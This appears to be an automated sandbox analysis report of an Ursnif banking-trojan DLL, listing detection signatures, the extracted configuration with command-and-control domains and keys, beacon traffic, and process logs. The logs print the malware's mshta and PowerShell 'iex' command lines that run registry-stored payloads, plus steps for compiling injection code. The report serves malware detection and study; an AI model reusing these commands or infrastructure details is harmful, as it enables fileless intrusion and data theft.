Windows Analysis Report SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710 (renamed file extension from 30710 to dll)
Analysis ID:	446378
MD5:	f3be390b01c85970deeae124ca36ce2d
SHA1:	93114ecf1b2c711ec10e1fafdc834393efc11a97
SHA256:	4eef8b6a5bcd808cd0ab0e33efcea2c2f9a36abe556e56556de8550383c9d3ce
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Allocates memory in foreign processes

Compiles code for process injection (via .Net compiler)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000004.00000003.744049460.0000000003140000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Source: gtr.antoinfer.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	Virustotal: Detection: 20%			Perma Link
Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	ReversingLabs: Detection: 20%

Compliance:

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.886639113.0000020E19BA0000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.894358562.000001466F560000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
Source:	Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: loaddll32.exe, 00000000.00000002.918197086.000000006D4EC000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49751 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49751 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49752 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49752 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49757 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49757 -> 165.232.183.49:80

Source: global traffic	HTTP traffic detected: GET /6jptEA6wC8OB7/q7vTQZto/d5CchjdbRrqZ5Z6Z_2Bg1vm/WfbX13QLJh/A2YEXLOoa_2F7tRm_/2FNwBUDimj6E/uPAUHKBNpk1/VjWeByKba7dA22/iqRSzqgEmB8mQYjX5o51W/j5ZXNQEryFUoJZBW/23tsS6zCPUWYtMD/UgNU1ARyOqPJE6n7Jx/XOgl3vdma/Y9s8AjQPcJNHAV_2FpBb/lOSs_2B_2Fregn_2FdZ/VSdKs_2FcaLNlVfbwth9Oi/4Vv_2ByCuk9fd/KEhpOJmg/c26kjnO4VZB2XIIXhQgYfGA/kb61PFLJEL/EFmfSuje8R4VMH6_2/BZs_2FmiZbLkWW5Nz8ToLf/Y HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqFQ_2BU/yM9SZV6ME7y_2FqkK/It7SIsAlfzad/nxZBZ52awi6/psN6Yj3z7wNsMk/xQu7epV5m4ODSAWDxLy1j/Gk_2FldXWGNOMAHD/fQa5bj6bJuGJvLC/_2BINvzSWHR8aC2WFb/3FD_2BoRU/0ETns47no1FSMZrZVvpo/oidVSWsyBZKZQ2VvZTQ/apd5gJV2bxCtRREtLzEP23/aQrm19tIQuqLU/uXn4W8I5/0vUbA5p07eFzebEv_2BENSg/QJGoAud5ASp7/0hsFWY2nQ/G HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/LlVOlbNj6/RPZQwcj8bJhS19L7epbH/8FoJWjd_2B_2FoGw2Bm/R78HTVyDDDMhzpL_2B_2BC/NT4N_2BZc5JJ5/UVDvzetX/v8gnM8_2BpN7NJffSmXgZSS/qqPoPFwQjt/P6AxMC53uAUww_2Bc/nxUF1jZoiqDv/fS2kjrbVKTg/KntWa8B08GJbBA/JKUoQSoG69VvL_2FI3TFW/zn35_2FieOhXHllq/8OehjRVegYhlQWm/W_2BILGcprIvR338Fg/HNspl_2F5/DJjDkA4zF03Nn8/04W HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive

Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: Yara match	File source: 3.3.rundll32.exe.58994a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.831952409.0000000005899000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917944713.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818012728.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.817964029.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872375871.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872502118.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872568970.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.842857177.000000000571C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818032883.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872538099.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.817990200.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818066502.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818077970.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.902106165.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818050164.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.818087028.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872450452.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872334930.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872555315.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872419175.0000000003698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6320, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6348, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A1EC7 NtMapViewOfSection,	0_2_6D4A1EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A1B9C GetProcAddress,NtCreateSection,memset,	0_2_6D4A1B9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2485 NtQueryVirtualMemory,	0_2_6D4A2485

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2264	0_2_6D4A2264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C95F0	0_2_6D4C95F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D5D07	0_2_6D4D5D07
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E2DC2	0_2_6D4E2DC2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E2CA2	0_2_6D4E2CA2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E3E8A	0_2_6D4E3E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D1969	0_2_6D4D1969
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D3970	0_2_6D4D3970
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E9271	0_2_6D4E9271

Source: a5q0nxag.dll.23.dr	Static PE information: No import functions for PE file found
Source: 1t143vp1.dll.25.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C260AEB2-3929-44C1-D316-7DB8B7AA016C}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E276F25A-D908-64DC-7336-1DD857CAA18C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Fatreply
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Periodwait
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Seemprove
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Which
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82956 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4013.tmp' 'c:\Users\user\AppData\Local\Temp\a5q0nxag\CSCA0E183A53BA24AF88D541EA58AA2F519.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E4C.tmp' 'c:\Users\user\AppData\Local\Temp\1t143vp1\CSC76ED9B8CEB314CD89B53DEEDCE956C.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Fatreply	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Periodwait	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Seemprove	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Which	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82950 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82956 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4013.tmp' 'c:\Users\user\AppData\Local\Temp\a5q0nxag\CSCA0E183A53BA24AF88D541EA58AA2F519.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E4C.tmp' 'c:\Users\user\AppData\Local\Temp\1t143vp1\CSC76ED9B8CEB314CD89B53DEEDCE956C.TMP'

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2253 push ecx; ret	0_2_6D4A2263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A2200 push ecx; ret	0_2_6D4A2209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4AF534 push FFFFFFDFh; iretd	0_2_6D4AF572
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B05A0 push 0000007Eh; iretd	0_2_6D4B05A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4AFF25 push ebp; ret	0_2_6D4AFF26
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B2948 push dword ptr [edi]; retf	0_2_6D4B297A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B11C5 push edi; iretd	0_2_6D4B11E1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B11D9 push edi; iretd	0_2_6D4B11E1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4AE189 push edi; ret	0_2_6D4AE18A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E9998 push ecx; ret	0_2_6D4E9996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B0B2B push edx; ret	0_2_6D4B0B2E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D5129E4 push ebx; retn 0040h	0_2_6D5129E7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D512780 pushfd ; ret	0_2_6D512781

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.dll			Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
